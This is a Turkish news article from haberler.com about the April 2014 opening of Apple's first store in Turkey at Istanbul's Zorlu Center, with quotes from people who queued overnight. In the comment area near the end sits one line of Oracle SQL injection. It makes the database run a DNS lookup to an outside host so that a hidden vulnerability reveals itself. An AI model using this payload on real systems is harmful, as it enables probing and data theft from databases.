Apple Store İstanbul'un ilk günü

Apple, Türkiye'de ilk mağazasını İstanbul'da açtı. Açılışı merakla bekleyen yüzlerce vatandaş, geceyi mağazanın önünde geçirdi.
06 Nisan 2014 18:15
Apple Store İstanbulun ilk günü
Dünyaca ünlü teknoloji markası Apple, Türkiye'de ilk mağazasını İstanbul Zorlu Center'da açtı. 
 
Yüzlerce vatandaş merakla beklenen Apple mağazası önünde açılıştan 13 saat önce kuyruk oluşturmaya başladı.
 
ŞEHİR DIŞINDAN GELENLER VAR
 
İstanbul'da bulunan vatandaşların yanı sıra şehir dışından gelen onlarca vatandaş açılış için Zorlu Center'a akın etti. Apple Store mağazasının açılışı saat 10.00'da vatandaşların coşkusuyla yapıldı.
 
MAĞAZANIN İLK MÜŞTERİSİ HAZIRLIKLI GELMİŞ
 
Açılışta saat 21.00'den beri kuyrukta yer alan Mustafa Çelik isimli vatandaş mağazanın ilk müşterisi oldu. Tezarruatlar eşliğinde mağazaya alınan Mustafa Çelik, "Geceyi arkadaşlarımızla beraber burada geçirdik. Kahvemizi, meyvemizi getirdik. Apple Store dünyada çok önemli bir yere sahip. Türkiye'de ilk mağazası, önemsediğimiz için geldik. Eğlenceli bir gece, güzel bir anı oldu bizim için" dedi.
 
İstanbul'da Apple Store açılacağını duyduğu andan beri beklediğini belirten Aslı İrem Ataç, "Çok heyecanlıyız. Saat 05.00'ten itibaren kuyrukta bekliyoruz. Biz yakında oturuyoruz ama uzaklardan gelen arkadaşlarımızın da olduğunu duyduk. Herkesin çok mutlu olduğunu düşünüyorum" şeklinde konuştu.
 
"ADANA'DAN GELDİK"
 
Apple Store mağazasının açılışı için Adana'dan gelen Aziz ve Uğur Mert ise saat 03.00'ten beri beklediklerini belirterek, "Merakla bekliyoruz. Sürprizlerini bekliyoruz. Çok üşüdük, biraz rezil olduk ama değer" diye konuştu. Mağazayı gezen vatandaşlar Apple'nin ürünlerine büyük ilgi gösterdi.
haberler.com
445411
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
06 Nisan 2014, Pazar 23:07
aman nede önemli sanki...
Bu haberler ilginizi çekebilir